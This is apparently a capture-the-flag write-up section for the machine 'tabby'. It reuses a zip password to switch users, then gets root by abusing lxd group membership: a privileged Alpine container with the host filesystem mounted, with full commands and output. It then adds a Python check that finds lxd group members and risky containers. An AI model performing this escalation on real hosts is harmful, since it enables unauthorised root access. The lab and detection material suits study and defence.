5 tomcat > ash > root
Using the zip's password for ash
su - ash
admin@it
whoami;id
ash
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
sudo -l
Sorry, user ash may not run sudo on tabby.
linEnum
[+] We're a member of the (lxd) group - could possibly misuse these rights!
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
There is a folder on the desktop called snap, which has an lxd directory inside.
Using https://www.hackingarticles.in/lxd-privilege-escalation/
[on kali]
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine
= created alpine.tar.gz, move it to target =
[target]
lxc image list
+-------+-------------+--------+-------------+--------------+------+------+-------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+-------------+--------+-------------+--------------+------+------+-------------+
lxc image import /home/ash/alpine.tar.gz --alias kashz
lxc image list
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
| kashz | a0ea33913002 | no | alpine v3.14 (20210616_17:12) | x86_64 | CONTAINER | 3.09MB | Jun 17, 2021 at 12:28am (UTC) |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
lxd init
(enter for all defaults)
lxc init kashz ignite -c security.privileged=true
Creating ignite
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
/bin/sh: whoami;id
root
uid=0(root) gid=0(root)
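A defender-side check for the condition this section depends on (an ordinary account in the lxd group, and a container started with security.privileged=true and the host / attached as a disk), added here as an example and not part of the original notes. It assumes the inputs are the text of /etc/group and the output of `lxc list --format json`; the function names and the sample data are constructed for illustration.

```python
import json

# Constructed sample data: /etc/group lines and trimmed `lxc list --format json` output.
SAMPLE_GROUP = "adm:x:4:syslog,ash\nlxd:x:116:ash\n"
SAMPLE_INSTANCES = json.dumps([
    {"name": "ignite",
     "expanded_config": {"security.privileged": "true"},
     "expanded_devices": {
         "mydevice": {"type": "disk", "source": "/", "path": "/mnt/root", "recursive": "true"},
         "root": {"type": "disk", "pool": "default", "path": "/"}}},
    {"name": "web",
     "expanded_config": {},
     "expanded_devices": {"root": {"type": "disk", "pool": "default", "path": "/"}}},
])

def lxd_group_members(group_text, group="lxd"):
    """Return accounts listed as supplementary members of `group` in /etc/group text."""
    for line in group_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) == 4 and fields[0] == group:
            return [user for user in fields[3].split(",") if user]
    return []

def risky_instances(instances_json):
    """Flag instances that are privileged and/or have a host path attached as a disk."""
    findings = []
    for inst in json.loads(instances_json):
        cfg = inst.get("expanded_config") or {}
        devs = inst.get("expanded_devices") or {}
        privileged = str(cfg.get("security.privileged", "false")).lower() in ("true", "1", "yes", "on")
        # A disk with an absolute "source" and no "pool" is a host path, not a storage volume.
        host_mounts = sorted(
            dev["source"] for dev in devs.values()
            if dev.get("type") == "disk"
            and dev.get("source", "").startswith("/")
            and "pool" not in dev
        )
        if privileged or host_mounts:
            findings.append({"name": inst["name"], "privileged": privileged,
                             "host_mounts": host_mounts})
    return findings

if __name__ == "__main__":
    print("lxd group members:", lxd_group_members(SAMPLE_GROUP))
    for finding in risky_instances(SAMPLE_INSTANCES):
        print(finding)
```

Membership of the lxd group should be treated as equivalent to root on the host, so any account the first function returns belongs in the same review as sudoers entries.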